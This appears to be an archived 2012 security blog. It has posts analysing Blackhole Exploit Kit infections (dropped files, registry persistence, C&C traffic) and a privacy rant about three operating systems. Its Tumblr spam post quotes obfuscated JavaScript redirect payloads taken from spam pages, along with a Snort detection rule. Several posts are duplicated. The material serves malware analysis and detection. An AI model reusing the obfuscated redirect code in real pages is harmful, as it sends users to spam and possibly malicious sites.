Thursday, December 20, 2012
Tuesday, December 4, 2012
Blackhole Exploit Kit Observations
Hey all,
Been doing a bit of research, and I've found some interesting correlations with the BEK. First off, I'll be looking at three separate incidents:
Oct 22 2012 - Microsoft Support spoofed emails
Oct 23 2012 - LinkedIn spoofed emails
Dec 4 2012 - US Airways spoofed emails
The method of infection is pretty much the same and well documented...click the link, and your flash/reader/java versions are checked, then exploited. After that, usually Zeus or Cridex is installed and your machine starts talking to their C&C servers. It's this point that I'm looking at. There are some variances, but the general flow seems to be:
Exploited java creates:
C:\Documents and Settings\username\wgsdgsdgdsgsd.exe
Internet Explorer creates:
C:\DOCUME~1\username\LOCALS~1\Temp\wpbt0.dll
wpbt0.dll creates (and starts) a secondary downloaded executable file
or
wgsdgsdgdsgsd.exe creates (and starts) a secondary downloaded executable file, usually a KB00random#s.exe
File C:\Documents and Settings\username\Application Data\94B3EB7A and Registry Key HKCU\Software\Microsoft\Windows NT\S94B3EB7A are created. This entry is what I believe to be the list of banks and sites to steal your data and has some interesting bits:
File C:\Documents and Settings\jlay\Local Settings\Temporary Internet Files\Content.IE5\<random>\AjX0[1].txt is created. This file I believe is encrypted and portions of it are sent to the C&C server:
I suspect this file contains information about your machine/user info/etc. In two cases this file was close to 100kB, in the last case it was over 440kB!
For reboot survival, key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00729045.exe is created.
Lastly, wgsdgsdgdsgsd.exe and wpbt0.dll createa couple .bat files are created that attempt to delete a few files:
C:\Documents and Settings\username\Local Settings\Temp\exp3.tmp.bat
C:\Documents and Settings\username\Local Settings\Temp\exp1.tmp.bat
Things I need to do:
Create a snort rule
Figure out how to decrypt the AjX0 files
Thanks.
Been doing a bit of research, and I've found some interesting correlations with the BEK. First off, I'll be looking at three separate incidents:
Oct 22 2012 - Microsoft Support spoofed emails
Oct 23 2012 - LinkedIn spoofed emails
Dec 4 2012 - US Airways spoofed emails
The method of infection is pretty much the same and well documented...click the link, and your flash/reader/java versions are checked, then exploited. After that, usually Zeus or Cridex is installed and your machine starts talking to their C&C servers. It's this point that I'm looking at. There are some variances, but the general flow seems to be:
Exploited java creates:
C:\Documents and Settings\username\wgsdgsdgdsgsd.exe
Internet Explorer creates:
C:\DOCUME~1\username\LOCALS~1\Temp\wpbt0.dll
wpbt0.dll creates (and starts) a secondary downloaded executable file
or
wgsdgsdgdsgsd.exe creates (and starts) a secondary downloaded executable file, usually a KB00random#s.exe
File C:\Documents and Settings\username\Application Data\94B3EB7A and Registry Key HKCU\Software\Microsoft\Windows NT\S94B3EB7A are created. This entry is what I believe to be the list of banks and sites to steal your data and has some interesting bits:
File C:\Documents and Settings\jlay\Local Settings\Temporary Internet Files\Content.IE5\<random>\AjX0[1].txt is created. This file I believe is encrypted and portions of it are sent to the C&C server:
I suspect this file contains information about your machine/user info/etc. In two cases this file was close to 100kB, in the last case it was over 440kB!
For reboot survival, key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00729045.exe is created.
Lastly, wgsdgsdgdsgsd.exe and wpbt0.dll createa couple .bat files are created that attempt to delete a few files:
C:\Documents and Settings\username\Local Settings\Temp\exp3.tmp.bat
C:\Documents and Settings\username\Local Settings\Temp\exp1.tmp.bat
Things I need to do:
Create a snort rule
Figure out how to decrypt the AjX0 files
Thanks.
Monday, November 19, 2012
The Sad State of the Modern OS
In today's lesson, we'll look at the following operating systems on an older Mac Mini (2 GHz, 2 gigs of RAM):
Our first contestant: OS X Mountain Lion
Apple has decided that OS X Mountain Lion won't run on this device. Technically game over, but for poops and giggles let's look at some nuggets from a device that it DOES run on:
Some of OS X's processes flat out refuse to use whatever proxy settings you've hard set in your Network settings, and will fail if you attempt to proxy transparently (Dictation). Why is that? I suspect it's because of this:
"When you use the keyboard dictation feature on your computer, the things you dictate will be recorded and sent to Apple to convert what you say into text. Your computer will also send Apple other information, such as your first name and nickname; and the names, nicknames, and relationship with you (for example, “my dad”) of your address book contacts."
The "such as" is especially exciting...I'm betting it's far more, and Apple doesn't want you to see it, hence proxy fail
In Lion, most of your jazz (contacts, notes, etc...) sync'd via iTunes to your iPhone and life was good. In Mountain Lion, Apple has removed that and now you MUST use iCloud. Have you LOOKED at the iCloud privacy statement? Some tidbits below:
To provide such features or services, where available, Apple and its partners and licensors must collect, use, transmit, process and maintain your location data, including but not limited to the geographic location of your device and information related to your iCloud account (“Account”) and any devices registered thereunder, including but not limited to your Apple ID, device ID and name, and device type.
When you create an Apple ID, register your products, apply for commercial credit, purchase a product, download a software update, register for a class at an Apple Retail Store, or participate in an online survey, we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information.
When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number.
In the U.S., we may ask for your Social Security number (SSN) but only in limited circumstances such as when setting up a wireless account and activating your iPhone or when determining whether to extend commercial credit.
We also use personal information to help us develop, deliver, and improve our products, services, content, and advertising.
We also use personal information to help us develop, deliver, and improve our products, services, content, and advertising.
We may collect information such as occupation, language, zip code, area code, unique device identifier, location, and the time zone where an Apple product is used so that we can better understand customer behavior and improve our products, services, and advertising.
As is true of most websites, we gather some information automatically and store it in log files. This information includes Internet Protocol (IP) addresses, browser type and language, Internet service provider (ISP), referring and exit pages, operating system, date/time stamp, and clickstream data.
We use this information to understand and analyze trends, to administer the site, to learn about user behavior on the site, and to gather demographic information about our user base as a whole. Apple may use this information in our marketing and advertising services.
Yea pass thanks. Apple is forcing you to use their service so they can sell your info...nice. Fail..and done with OS X!
Next up, Ubuntu 12.10 Client!
One of the staples of Linux, is the fact that you can just about throw it on anything and it will work, and do it well. Ubuntu 12.10 gives a fat "shove it" to that notion. Ubuntu 12.10 on this same Mac Mini fails to work with the aging Intel 945GM graphic card (the ancient 1024x768 is the max res you'll get). This "modern OS" was released just last month, yet can't see my card. A fresh install with a 2009 Windows 7 cd, and Windows sees the card and gives me full res's right out the gate, not even with SP1. WTH. Couple this with the shameless (and insecure) bundling of desktop search with Amazon (link here) and this OS, is fail.
NEXT
Windows 8
Now I must admit, that Windows 8 is worse than I thought it would be :) Taking a queue from Apple, certain process will happily disregard your proxy settings and go direct to the Net. Again, why is that? It's not to hide their in-app advertisements (link here), those are bad enough (this is my DESKTOP OPERATION SYSTEM, NOT MY PHONE). I have yet to try and transparently proxy the traffic to see what it's doing. And they there's the new Store...a shameless (and late) copy of Apple's Store. Come to think of it, isn't the whole Metro UI about...5 years late if they wanted to be like Apple? Fail.
And there it is! So what's a tech person to do when the big three of OS's are going in directions that are technically questionable, clearly made for the masses, and seem hell bent on acquiring (and selling) my data? It's a sad way.
Our first contestant: OS X Mountain Lion
Apple has decided that OS X Mountain Lion won't run on this device. Technically game over, but for poops and giggles let's look at some nuggets from a device that it DOES run on:
Some of OS X's processes flat out refuse to use whatever proxy settings you've hard set in your Network settings, and will fail if you attempt to proxy transparently (Dictation). Why is that? I suspect it's because of this:
"When you use the keyboard dictation feature on your computer, the things you dictate will be recorded and sent to Apple to convert what you say into text. Your computer will also send Apple other information, such as your first name and nickname; and the names, nicknames, and relationship with you (for example, “my dad”) of your address book contacts."
The "such as" is especially exciting...I'm betting it's far more, and Apple doesn't want you to see it, hence proxy fail
In Lion, most of your jazz (contacts, notes, etc...) sync'd via iTunes to your iPhone and life was good. In Mountain Lion, Apple has removed that and now you MUST use iCloud. Have you LOOKED at the iCloud privacy statement? Some tidbits below:
To provide such features or services, where available, Apple and its partners and licensors must collect, use, transmit, process and maintain your location data, including but not limited to the geographic location of your device and information related to your iCloud account (“Account”) and any devices registered thereunder, including but not limited to your Apple ID, device ID and name, and device type.
When you create an Apple ID, register your products, apply for commercial credit, purchase a product, download a software update, register for a class at an Apple Retail Store, or participate in an online survey, we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information.
When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number.
In the U.S., we may ask for your Social Security number (SSN) but only in limited circumstances such as when setting up a wireless account and activating your iPhone or when determining whether to extend commercial credit.
We also use personal information to help us develop, deliver, and improve our products, services, content, and advertising.
We also use personal information to help us develop, deliver, and improve our products, services, content, and advertising.
We may collect information such as occupation, language, zip code, area code, unique device identifier, location, and the time zone where an Apple product is used so that we can better understand customer behavior and improve our products, services, and advertising.
As is true of most websites, we gather some information automatically and store it in log files. This information includes Internet Protocol (IP) addresses, browser type and language, Internet service provider (ISP), referring and exit pages, operating system, date/time stamp, and clickstream data.
We use this information to understand and analyze trends, to administer the site, to learn about user behavior on the site, and to gather demographic information about our user base as a whole. Apple may use this information in our marketing and advertising services.
Yea pass thanks. Apple is forcing you to use their service so they can sell your info...nice. Fail..and done with OS X!
Next up, Ubuntu 12.10 Client!
One of the staples of Linux, is the fact that you can just about throw it on anything and it will work, and do it well. Ubuntu 12.10 gives a fat "shove it" to that notion. Ubuntu 12.10 on this same Mac Mini fails to work with the aging Intel 945GM graphic card (the ancient 1024x768 is the max res you'll get). This "modern OS" was released just last month, yet can't see my card. A fresh install with a 2009 Windows 7 cd, and Windows sees the card and gives me full res's right out the gate, not even with SP1. WTH. Couple this with the shameless (and insecure) bundling of desktop search with Amazon (link here) and this OS, is fail.
NEXT
Windows 8
Now I must admit, that Windows 8 is worse than I thought it would be :) Taking a queue from Apple, certain process will happily disregard your proxy settings and go direct to the Net. Again, why is that? It's not to hide their in-app advertisements (link here), those are bad enough (this is my DESKTOP OPERATION SYSTEM, NOT MY PHONE). I have yet to try and transparently proxy the traffic to see what it's doing. And they there's the new Store...a shameless (and late) copy of Apple's Store. Come to think of it, isn't the whole Metro UI about...5 years late if they wanted to be like Apple? Fail.
And there it is! So what's a tech person to do when the big three of OS's are going in directions that are technically questionable, clearly made for the masses, and seem hell bent on acquiring (and selling) my data? It's a sad way.
Friday, June 29, 2012
Tumblr Redirects
Tumblr Redirects
Recently I’ve been seeing spams as shown below:
Your inbox is full of surprises from a special someone. You should go check it out now. To receive this special gift, View Here
Sent from Yahoo! Mail on Android
The “view here” goes to links such as (one used the t.co url shortening service however before going to Tumblr):
kmghoshk.tumblr.com
wcmxztol.tumblr.com
These links contain the below obfuscated javascript:
var dnc='http'; var ghmr='://e'; function
ertryu(wnz,hfy){return wnz+hfy} var ndnkkl=ertryu(dnc,ghmr);var qvst='card';
var fcv='love'; function ikgofp(gtq,ojh){return gtq+ojh} var
pdgfvt=ikgofp(qvst,fcv);var ymm='wis'; var zko='h.co'; function
hgypvh(ocu,cln){return ocu+cln} var ehillv=hgypvh(ymm,zko);var jah='m/?'; var
wlo='6QBc'; var ehjh='kb'; function iatyan(rcw,dgi,ygk){return rcw+dgi+ygk} var
hjgfam=iatyan(jah,wlo,ehjh); var kwzkgy=ndnkkl+pdgfvt+ehillv+hjgfam;
document.location = kwzkgy
var uvw='http'; var unn='://e'; function xoimr(qmn,cey){return qmn+cey} var opbsj=xoimr(uvw,unn);var jvgt='card'; var smo='lov'; function dbog(tzp,nqh){return tzp+nqh} var rvoa=dbog(jvgt,smo);var foi='ersw'; var rth='ish'; function qzhlg(uwu,mrg){return uwu+mrg} var wtzdi=qzhlg(foi,rth);var hqzh='.com'; var vrly='/?C'; function shfq(fgk,yom){return fgk+yom} var vzby=shfq(hqzh,vrly);var dih='qdve'; var ibt='e'; function rdetyd(xep,itr){return xep+itr} var ybvpit=rdetyd(dih,ibt); var vaybau=opbsj+rvoa+wtzdi+vzby+ybvpit; document.location = vaybau
These decode to links pointing to:
hxxp://ecardlovewish.com/?6QBckb
Which in turn go to silly dating sites (iHookup, ScoreNextDoor, etc…)
Update 1:
The bad guys have added an additional method for this:
var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; document.location = otoa
The below Snort sig should match both of these now:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT Tumblr spam redirect"; flow:from_server; file_data; content:"='htt"; content:"://"; within: 15; metadata:policy security-ips drop, service http; classtype:bad-unknown; sid:10000014; reference:url,malwareandmore.blogspot.com/2012/06/tumblr-redirects.html; rev:2;)
Subscribe to:
Posts (Atom)